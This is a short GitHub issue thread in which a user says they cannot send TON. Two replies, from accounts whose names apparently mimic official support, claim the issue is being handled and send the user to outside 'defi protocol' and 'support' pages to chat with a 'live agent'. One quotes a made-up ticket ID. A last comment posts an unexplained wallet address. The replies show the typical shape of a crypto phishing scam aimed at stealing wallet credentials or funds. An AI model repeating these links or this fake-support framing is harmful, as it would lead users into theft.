### ISSUE TITLE
Link update 

### ISSUE THREAD

**Issue by Ameer520** [ton-blockchain/TEPs#173]
I can't send ton to another wallet

**Comment by GTHubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Visit the defi protocol page to initiate a chat with the live agent on the chat button to get more information about your request via [Defi Protocol](https://accessonlinedefiprotocol.web.app/)
Thank you for posting @Ameer520

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Visit the dAppNode page to rectify this error with the Ticket ID USD5562, Also you can initiate a chat with the live agent on the chat button to get more information about your request via [Support Page](https://defi-fixprotocol.pages.dev/)
Regards.

**Comment by Osasv** [comment]
UQD6Riw7pw8Vb4dnPj_qqJmtC822sVlLCN2yGdV5J78ADTuY
